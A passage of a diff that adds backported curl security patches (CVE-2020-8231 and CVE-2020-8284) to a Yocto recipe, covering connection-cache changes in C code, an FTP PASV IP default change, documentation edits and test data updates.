+- so this is precaution that it isn't NULL. And it silences static
+- analyzers. */
+- failf(data, "In state %d with no conn, bail out!\n", data->mstate);
+- return CURLM_INTERNAL_ERROR;
+- }
+-
+ if(multi_ischanged(multi, TRUE)) {
+ DEBUGF(infof(data, "multi changed, check CONNECT_PEND queue!\n"));
+ process_pending_handles(multi); /* multiplexed */
+@@ -2231,8 +2227,7 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ * access free'd data, if the connection is free'd and the handle
+ * removed before we perform the processing in CURLM_STATE_COMPLETED
+ */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ }
+
+ #ifndef CURL_DISABLE_FTP
+@@ -2284,7 +2279,10 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ /* This is where we make sure that the conn pointer is reset.
+ We don't have to do this in every case block above where a
+ failure is detected */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, conn, TRUE);
+
+ /* disconnect properly */
+ Curl_disconnect(data, conn, dead_connection);
+diff --git a/lib/multiif.h b/lib/multiif.h
+index bde755e..c07587b 100644
+--- a/lib/multiif.h
++++ b/lib/multiif.h
+@@ -33,6 +33,7 @@ void Curl_expire_done(struct Curl_easy *data, expire_id id);
+ void Curl_update_timer(struct Curl_multi *multi);
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn);
++void Curl_detach_connnection(struct Curl_easy *data);
+ bool Curl_multiplex_wanted(const struct Curl_multi *multi);
+ void Curl_set_in_callback(struct Curl_easy *data, bool value);
+ bool Curl_is_in_callback(struct Curl_easy *easy);
+diff --git a/lib/url.c b/lib/url.c
+index a826f8a..4ed0623 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -679,9 +679,7 @@ static void conn_reset_all_postponed_data(struct connectdata *conn)
+
+ static void conn_shutdown(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
+-
++ DEBUGASSERT(conn);
+ infof(conn->data, "Closing connection %ld\n", conn->connection_id);
+ DEBUGASSERT(conn->data);
+
+@@ -702,16 +700,11 @@ static void conn_shutdown(struct connectdata *conn)
+ Curl_closesocket(conn, conn->tempsock[0]);
+ if(CURL_SOCKET_BAD != conn->tempsock[1])
+ Curl_closesocket(conn, conn->tempsock[1]);
+-
+- /* unlink ourselves. this should be called last since other shutdown
+- procedures need a valid conn->data and this may clear it. */
+- Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ }
+
+ static void conn_free(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
++ DEBUGASSERT(conn);
+
+ Curl_free_idnconverted_hostname(&conn->host);
+ Curl_free_idnconverted_hostname(&conn->conn_to_host);
+@@ -778,13 +771,17 @@ static void conn_free(struct connectdata *conn)
+ CURLcode Curl_disconnect(struct Curl_easy *data,
+ struct connectdata *conn, bool dead_connection)
+ {
+- if(!conn)
+- return CURLE_OK; /* this is closed and fine already */
++ /* there must be a connection to close */
++ DEBUGASSERT(conn);
+
+- if(!data) {
+- DEBUGF(infof(data, "DISCONNECT without easy handle, ignoring\n"));
+- return CURLE_OK;
+- }
++ /* it must be removed from the connection cache */
++ DEBUGASSERT(!conn->bundle);
++
++ /* there must be an associated transfer */
++ DEBUGASSERT(data);
++
++ /* the transfer must be detached from the connection */
++ DEBUGASSERT(!data->conn);
+
+ /*
+ * If this connection isn't marked to force-close, leave it open if there
+@@ -800,16 +797,11 @@ CURLcode Curl_disconnect(struct Curl_easy *data,
+ conn->dns_entry = NULL;
+ }
+
+- Curl_hostcache_prune(data); /* kill old DNS cache entries */
+-
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_NTLM)
+ /* Cleanup NTLM connection-related data */
+ Curl_http_auth_cleanup_ntlm(conn);
+-#endif
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_SPNEGO)
++
+ /* Cleanup NEGOTIATE connection-related data */
+ Curl_http_auth_cleanup_negotiate(conn);
+-#endif
+
+ /* the protocol specific disconnect handler and conn_shutdown need a transfer
+ for the connection! */
+@@ -1006,8 +998,12 @@ static int call_extract_if_dead(struct connectdata *conn, void *param)
+ static void prune_dead_connections(struct Curl_easy *data)
+ {
+ struct curltime now = Curl_now();
+- timediff_t elapsed =
++ timediff_t elapsed;
++
++ CONNCACHE_LOCK(data);
++ elapsed =
+ Curl_timediff(now, data->state.conn_cache->last_cleanup);
++ CONNCACHE_UNLOCK(data);
+
+ if(elapsed >= 1000L) {
+ struct prunedead prune;
+@@ -1015,10 +1011,17 @@ static void prune_dead_connections(struct Curl_easy *data)
+ prune.extracted = NULL;
+ while(Curl_conncache_foreach(data, data->state.conn_cache, &prune,
+ call_extract_if_dead)) {
++ /* unlocked */
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, prune.extracted, TRUE);
++
+ /* disconnect it */
+ (void)Curl_disconnect(data, prune.extracted, /* dead_connection */TRUE);
+ }
++ CONNCACHE_LOCK(data);
+ data->state.conn_cache->last_cleanup = now;
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+
+@@ -1078,7 +1081,7 @@ ConnectionExists(struct Curl_easy *data,
+ if(data->set.pipewait) {
+ infof(data, "Server doesn't support multiplex yet, wait\n");
+ *waitpipe = TRUE;
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE; /* no re-use */
+ }
+
+@@ -1402,11 +1405,12 @@ ConnectionExists(struct Curl_easy *data,
+ if(chosen) {
+ /* mark it as used before releasing the lock */
+ chosen->data = data; /* own it! */
+- Curl_conncache_unlock(data);
++ Curl_attach_connnection(data, chosen);
++ CONNCACHE_UNLOCK(data);
+ *usethis = chosen;
+ return TRUE; /* yes, we found one to use! */
+ }
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(foundPendingCandidate && data->set.pipewait) {
+ infof(data,
+@@ -3519,6 +3523,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ if(!result) {
+ conn->bits.tcpconnect[FIRSTSOCKET] = TRUE; /* we are "connected */
+
++ Curl_attach_connnection(data, conn);
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3533,7 +3538,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+ (void)conn->handler->done(conn, result, FALSE);
+ goto out;
+ }
+- Curl_attach_connnection(data, conn);
+ Curl_setup_transfer(data, -1, -1, FALSE, -1);
+ }
+
+@@ -3683,7 +3687,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ /* The bundle is full. Extract the oldest connection. */
+ conn_candidate = Curl_conncache_extract_bundle(data, bundle);
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(conn_candidate)
+ (void)Curl_disconnect(data, conn_candidate,
+@@ -3695,7 +3699,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ }
+ }
+ else
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ }
+
+@@ -3729,6 +3733,8 @@ static CURLcode create_conn(struct Curl_easy *data,
+ * This is a brand new connection, so let's store it in the connection
+ * cache of ours!
+ */
++ Curl_attach_connnection(data, conn);
++
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3883,7 +3889,7 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ result = create_conn(data, &conn, asyncp);
+
+ if(!result) {
+- if(CONN_INUSE(conn))
++ if(CONN_INUSE(conn) > 1)
+ /* multiplexed */
+ *protocol_done = TRUE;
+ else if(!*asyncp) {
+@@ -3900,11 +3906,10 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ else if(result && conn) {
+ /* We're not allowed to return failure with memory left allocated in the
+ connectdata struct, free those here */
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
+ Curl_disconnect(data, conn, TRUE);
+ }
+- else if(!result && !data->conn)
+- /* FILE: transfers already have the connection attached */
+- Curl_attach_connnection(data, conn);
+
+ return result;
+ }
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index 06f1897..d3926d9 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -29,6 +29,12 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -40,6 +46,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -51,6 +61,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+diff --git a/tests/unit/unit1620.c b/tests/unit/unit1620.c
+index 6e572c6..b23e5b9 100644
+--- a/tests/unit/unit1620.c
++++ b/tests/unit/unit1620.c
+@@ -5,7 +5,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -73,10 +73,6 @@ UNITTEST_START
+ fail_unless(rc == CURLE_OK,
+ "Curl_parse_login_details() failed");
+
+- rc = Curl_disconnect(empty, empty->conn, FALSE);
+- fail_unless(rc == CURLE_OK,
+- "Curl_disconnect() with dead_connection set FALSE failed");
+-
+ Curl_freeset(empty);
+ for(i = (enum dupstring)0; i < STRING_LAST; i++) {
+ fail_unless(empty->set.str[i] == NULL,
+--
+2.25.4
+
+
+From 6830828c9eecd9ab14404f2f49f19b56dec62130 Mon Sep 17 00:00:00 2001
+From: Marc Aldorasi <marc@groundctl.com>
+Date: Thu, 30 Jul 2020 14:16:17 -0400
+Subject: [PATCH 2/3] multi_remove_handle: close unused connect-only
+ connections
+
+Previously any connect-only connections in a multi handle would be kept
+alive until the multi handle was closed. Since these connections cannot
+be re-used, they can be marked for closure when the associated easy
+handle is removed from the multi handle.
+
+Closes #5749
+
+Upstream-commit: d5bb459ccf1fc5980ae4b95c05b4ecf6454a7599
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/multi.c | 34 ++++++++++++++++++++++++++++++----
+ tests/data/test1554 | 6 ++++++
+ 2 files changed, 36 insertions(+), 4 deletions(-)
+
+diff --git a/lib/multi.c b/lib/multi.c
+index 249e360..f1371bd 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -682,6 +682,26 @@ static CURLcode multi_done(struct Curl_easy *data,
+ return result;
+ }
+
++static int close_connect_only(struct connectdata *conn, void *param)
++{
++ struct Curl_easy *data = param;
++
++ if(data->state.lastconnect != conn)
++ return 0;
++
++ if(conn->data != data)
++ return 1;
++ conn->data = NULL;
++
++ if(!conn->bits.connect_only)
++ return 1;
++
++ connclose(conn, "Removing connect-only easy handle");
++ conn->bits.connect_only = FALSE;
++
++ return 1;
++}
++
+ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ struct Curl_easy *data)
+ {
+@@ -765,10 +785,6 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ multi_done() as that may actually call Curl_expire that uses this */
+ Curl_llist_destroy(&data->state.timeoutlist, NULL);
+
+- /* as this was using a shared connection cache we clear the pointer to that
+- since we're not part of that multi handle anymore */
+- data->state.conn_cache = NULL;
+-
+ /* change state without using multistate(), only to make singlesocket() do
+ what we want */
+ data->mstate = CURLM_STATE_COMPLETED;
+@@ -778,12 +794,22 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
++ if(data->state.lastconnect) {
++ /* Mark any connect-only connection for closure */
++ Curl_conncache_foreach(data, data->state.conn_cache,
++ data, &close_connect_only);
++ }
++
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+ if(data->psl == &multi->psl)
+ data->psl = NULL;
+ #endif
+
++ /* as this was using a shared connection cache we clear the pointer to that
++ since we're not part of that multi handle anymore */
++ data->state.conn_cache = NULL;
++
+ data->multi = NULL; /* clear the association to this multi handle */
+
+ /* make sure there's no pending message in the queue sent from this easy
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index d3926d9..fffa6ad 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -50,6 +50,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -65,6 +67,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -74,6 +78,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ </datacheck>
+ </reply>
+
+--
+2.25.4
+
+
+From 01148ee40dd913a169435b0f9ea90e6393821e70 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sun, 16 Aug 2020 11:34:35 +0200
+Subject: [PATCH 3/3] Curl_easy: remember last connection by id, not by pointer
+
+CVE-2020-8231
+
+Bug: https://curl.haxx.se/docs/CVE-2020-8231.html
+
+Reported-by: Marc Aldorasi
+Closes #5824
+
+Upstream-commit: 3c9e021f86872baae412a427e807fbfa2f3e8a22
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/connect.c | 19 ++++++++++---------
+ lib/easy.c | 3 +--
+ lib/multi.c | 9 +++++----
+ lib/url.c | 2 +-
+ lib/urldata.h | 2 +-
+ 5 files changed, 18 insertions(+), 17 deletions(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index 29293f0..e1c5662 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -1356,15 +1356,15 @@ CURLcode Curl_connecthost(struct connectdata *conn, /* context */
+ }
+
+ struct connfind {
+- struct connectdata *tofind;
+- bool found;
++ long id_tofind;
++ struct connectdata *found;
+ };
+
+ static int conn_is_conn(struct connectdata *conn, void *param)
+ {
+ struct connfind *f = (struct connfind *)param;
+- if(conn == f->tofind) {
+- f->found = TRUE;
++ if(conn->connection_id == f->id_tofind) {
++ f->found = conn;
+ return 1;
+ }
+ return 0;
+@@ -1386,21 +1386,22 @@ curl_socket_t Curl_getconnectinfo(struct Curl_easy *data,
+ * - that is associated with a multi handle, and whose connection
+ * was detached with CURLOPT_CONNECT_ONLY
+ */
+- if(data->state.lastconnect && (data->multi_easy || data->multi)) {
+- struct connectdata *c = data->state.lastconnect;
++ if((data->state.lastconnect_id != -1) && (data->multi_easy || data->multi)) {
++ struct connectdata *c;
+ struct connfind find;
+- find.tofind = data->state.lastconnect;
+- find.found = FALSE;
++ find.id_tofind = data->state.lastconnect_id;
++ find.found = NULL;
+
+ Curl_conncache_foreach(data, data->multi_easy?
+ &data->multi_easy->conn_cache:
+ &data->multi->conn_cache, &find, conn_is_conn);
+
+ if(!find.found) {
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ return CURL_SOCKET_BAD;
+ }
+
++ c = find.found;
+ if(connp) {
+ /* only store this if the caller cares for it */
+ *connp = c;
+diff --git a/lib/easy.c b/lib/easy.c
+index 292cca7..a69eb9e 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -831,8 +831,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+
+ /* the connection cache is setup on demand */
+ outcurl->state.conn_cache = NULL;
+-
+- outcurl->state.lastconnect = NULL;
++ outcurl->state.lastconnect_id = -1;
+
+ outcurl->progress.flags = data->progress.flags;
+ outcurl->progress.callback = data->progress.callback;
+diff --git a/lib/multi.c b/lib/multi.c
+index f1371bd..778c537 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -453,6 +453,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->state.conn_cache = &data->share->conn_cache;
+ else
+ data->state.conn_cache = &multi->conn_cache;
++ data->state.lastconnect_id = -1;
+
+ #ifdef USE_LIBPSL
+ /* Do the same for PSL. */
+@@ -671,11 +672,11 @@ static CURLcode multi_done(struct Curl_easy *data,
+ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+- data->state.lastconnect = conn;
++ data->state.lastconnect_id = conn->connection_id;
+ infof(data, "%s\n", buffer);
+ }
+ else
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ }
+
+ Curl_free_request_state(data);
+@@ -686,7 +687,7 @@ static int close_connect_only(struct connectdata *conn, void *param)
+ {
+ struct Curl_easy *data = param;
+
+- if(data->state.lastconnect != conn)
++ if(data->state.lastconnect_id != conn->connection_id)
+ return 0;
+
+ if(conn->data != data)
+@@ -794,7 +795,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
+- if(data->state.lastconnect) {
++ if(data->state.lastconnect_id != -1) {
+ /* Mark any connect-only connection for closure */
+ Curl_conncache_foreach(data, data->state.conn_cache,
+ data, &close_connect_only);
+diff --git a/lib/url.c b/lib/url.c
+index a1a6b69..2919a3d 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -617,7 +617,7 @@ CURLcode Curl_open(struct Curl_easy **curl)
+ Curl_initinfo(data);
+
+ /* most recent connection is not yet defined */
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+
+ data->progress.flags |= PGRS_HIDE;
+ data->state.current_speed = -1; /* init to negative == impossible */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index f80a02d..6d8eb69 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1332,7 +1332,7 @@ struct UrlState {
+ /* buffers to store authentication data in, as parsed from input options */
+ struct curltime keeps_speed; /* for the progress meter really */
+
+- struct connectdata *lastconnect; /* The last connection, NULL if undefined */
++ long lastconnect_id; /* The last connection, -1 if undefined */
+
+ char *headerbuff; /* allocated buffer to store headers in */
+ size_t headersize; /* size of the allocation */
+--
+2.25.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8284.patch b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
new file mode 100644
index 0000000000..ed6e8049a6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
@@ -0,0 +1,209 @@
+From ec9cc725d598ac77de7b6df8afeec292b3c8ad46 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 24 Nov 2020 14:56:57 +0100
+Subject: [PATCH] ftp: CURLOPT_FTP_SKIP_PASV_IP by default
+
+The command line tool also independently sets --ftp-skip-pasv-ip by
+default.
+
+Ten test cases updated to adapt the modified --libcurl output.
+
+Bug: https://curl.se/docs/CVE-2020-8284.html
+CVE-2020-8284
+
+Reported-by: Varnavas Papaioannou
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/ec9cc725d598ac]
+CVE: CVE-2020-8284
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ docs/cmdline-opts/ftp-skip-pasv-ip.d | 2 ++
+ docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 | 8 +++++---
+ lib/url.c | 1 +
+ src/tool_cfgable.c | 1 +
+ tests/data/test1400 | 1 +
+ tests/data/test1401 | 1 +
+ tests/data/test1402 | 1 +
+ tests/data/test1403 | 1 +
+ tests/data/test1404 | 1 +
+ tests/data/test1405 | 1 +
+ tests/data/test1406 | 1 +
+ tests/data/test1407 | 1 +
+ tests/data/test1420 | 1 +
+ 14 files changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/docs/cmdline-opts/ftp-skip-pasv-ip.d b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+index d6fd4589b1e..bcf4e7e62f2 100644
+--- a/docs/cmdline-opts/ftp-skip-pasv-ip.d
++++ b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+@@ -10,4 +10,6 @@ to curl's PASV command when curl connects the data connection. Instead curl
+ will re-use the same IP address it already uses for the control
+ connection.
+
++Since curl 7.74.0 this option is enabled by default.
++
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+diff --git a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+index d6217d0d8ca..fa87ddce769 100644
+--- a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
++++ b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+@@ -5,7 +5,7 @@
+ .\" * | (__| |_| | _ <| |___
+ .\" * \___|\___/|_| \_\_____|
+ .\" *
+-.\" * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
++.\" * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ .\" *
+ .\" * This software is licensed as described in the file COPYING, which
+ .\" * you should have received as part of this distribution. The terms
+@@ -35,11 +35,13 @@ address it already uses for the control connection. But it will use the port
+ number from the 227-response.
+
+ This option thus allows libcurl to work around broken server installations
+-that due to NATs, firewalls or incompetence report the wrong IP address back.
++that due to NATs, firewalls or incompetence report the wrong IP address
++back. Setting the option also reduces the risk for various sorts of client
++abuse by malicious servers.
+
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+ .SH DEFAULT
+-0
++1 since 7.74.0, was 0 before then.
+ .SH PROTOCOLS
+ FTP
+ .SH EXAMPLE
+diff --git a/lib/url.c b/lib/url.c
+index f8b2a0030de..2b0ba87ba87 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -497,6 +497,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ftp_use_eprt = TRUE; /* FTP defaults to EPRT operations */
+ set->ftp_use_pret = FALSE; /* mainly useful for drftpd servers */
+ set->ftp_filemethod = FTPFILE_MULTICWD;
++ set->ftp_skip_ip = TRUE; /* skip PASV IP by default */
+ #endif
+ set->dns_cache_timeout = 60; /* Timeout every 60 seconds by default */
+
+diff --git a/src/tool_cfgable.c b/src/tool_cfgable.c
+index c52d8e1c6bb..4c06d3557b7 100644
+--- a/src/tool_cfgable.c
++++ b/src/tool_cfgable.c
+@@ -44,6 +44,7 @@ void config_init(struct OperationConfig *config)
+ config->tcp_nodelay = TRUE; /* enabled by default */
+ config->happy_eyeballs_timeout_ms = CURL_HET_DEFAULT;
+ config->http09_allowed = FALSE;
++ config->ftp_skip_ip = TRUE;
+ }
+
+ static void free_config_fields(struct OperationConfig *config)
+diff --git a/tests/data/test1400 b/tests/data/test1400
+index 812ad0b88d9..b7060eca58e 100644
+--- a/tests/data/test1400
++++ b/tests/data/test1400
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1401 b/tests/data/test1401
+index f93b3d637de..a2629683aff 100644
+--- a/tests/data/test1401
++++ b/tests/data/test1401
+@@ -87,6 +87,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_COOKIE, "chocolate=chip");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_PROTOCOLS, (long)CURLPROTO_FILE |
+ (long)CURLPROTO_FTP |
+diff --git a/tests/data/test1402 b/tests/data/test1402
+index 7593c516da1..1bd55cb4e3b 100644
+--- a/tests/data/test1402
++++ b/tests/data/test1402
+@@ -78,6 +78,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1403 b/tests/data/test1403
+index ecb4dd3dcab..a7c9fcca322 100644
+--- a/tests/data/test1403
++++ b/tests/data/test1403
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1404 b/tests/data/test1404
+index 97622b63948..1d8e8cf7779 100644
+--- a/tests/data/test1404
++++ b/tests/data/test1404
+@@ -147,6 +147,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1405 b/tests/data/test1405
+index 2bac79eda74..b4087704f7b 100644
+--- a/tests/data/test1405
++++ b/tests/data/test1405
+@@ -89,6 +89,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_POSTQUOTE, slist2);
+ curl_easy_setopt(hnd, CURLOPT_PREQUOTE, slist3);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1406 b/tests/data/test1406
+index 51a166adff2..38f68d11ee1 100644
+--- a/tests/data/test1406
++++ b/tests/data/test1406
+@@ -79,6 +79,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "smtp://%HOSTIP:%SMTPPORT/1406");
+ curl_easy_setopt(hnd, CURLOPT_UPLOAD, 1L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_MAIL_FROM, "sender@example.com");
+ curl_easy_setopt(hnd, CURLOPT_MAIL_RCPT, slist1);
+diff --git a/tests/data/test1407 b/tests/data/test1407
+index f6879008fb2..a7e13ba7585 100644
+--- a/tests/data/test1407
++++ b/tests/data/test1407
+@@ -62,6 +62,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_DIRLISTONLY, 1L);
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1420 b/tests/data/test1420
+index 057ecc4773a..4b8d7bbf418 100644
+--- a/tests/data/test1420
++++ b/tests/data/test1420
+@@ -67,6 +67,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "imap://%HOSTIP:%IMAPPORT/1420/;MAILINDEX=1");
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8285.patch b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
new file mode 100644
index 0000000000..a66729b180
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
